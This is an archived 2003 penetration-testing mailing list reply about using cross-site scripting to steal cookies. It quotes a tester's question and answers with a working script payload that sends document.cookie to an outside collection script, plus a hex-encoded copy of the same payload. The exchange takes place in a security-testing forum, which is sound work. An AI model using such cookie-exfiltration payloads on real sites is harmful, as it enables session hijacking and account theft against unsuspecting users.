Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

RE: Proof of Concept Tool on Web Application Security

From: "Robert Auger" <rauger () spidynamics com>
Date: Mon, 14 Apr 2003 11:12:52 -0400
Now I am testing Cross-Site Scripting to steal the client cookies, or any
other sensitive information. I am working on my own pen-test-testing site,
which is vulnerable to XSS. I was able to display the cookies of the client

at

the victim’s machine, but that was not my goal, my goal is to get that

cookies

on my machine or any desired location. So is there any way by which I can
transfer the victim’s cookie or any other information at my machine without
interaction of the victim.


This is covered in the cross site scripting FAQ located at
http://www.cgisecurity.com/articles/xss-faq.shtml.
The relevant JavaScript code you are looking for is as follows (A example
from the paper).

<script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?&apos;
+document.cookie</script>

(IN HEX)
%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%
3d%27%68%74%74
%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%
67%69%2d%62%69%6e
%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%
6f%6f%6b%69%65%3c
%2f%73%63%72%69%70%74%3e

(Note: This website has a public script that can be used for testing cookie
theft.)


Regards,

Robert Auger
SPI Labs




--------------------------------------------------------------
Costs are climbing and complaints are rising
as SPAM overloads your e-mail servers and Inboxes
SurfControl E-mail Filter puts the brakes on spam & viruses
and gives you the reports to prove it.
http://www.securityfocus.com/SurfControl-pen-test2
Download a free trial and see just
what's going in and out of your organization. 
--------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: